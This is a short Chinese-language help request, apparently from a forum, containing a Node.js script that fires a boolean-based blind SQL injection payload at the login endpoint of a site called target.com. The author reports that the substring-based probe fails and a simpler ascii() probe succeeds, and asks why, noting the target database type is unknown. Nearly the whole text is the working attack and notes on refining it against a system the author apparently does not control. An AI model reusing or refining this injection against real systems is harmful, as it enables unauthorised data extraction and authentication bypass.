我的要求是
var request = require('request');
request.post({
headers: {'content-type' : 'application/x-www-form-urlencoded'},
url: 'https://www.target.com/account/IsValidLogin',
form: {
userName: "example@example.org' AND ascii(substring('baaa',1,1))>2 AND 'x'='x",
password: "123456"
}
}, function(error, response, body){
console.log(body);
}
);
它崩溃了。好像目标DB不支持substring功能。但是,也许我写错了。据我所知substring是非常常见的功能。
如果我放置此example@example.org' AND ascii('b')>2 AND 'x'='x,则会返回true。
目标数据库类型未知。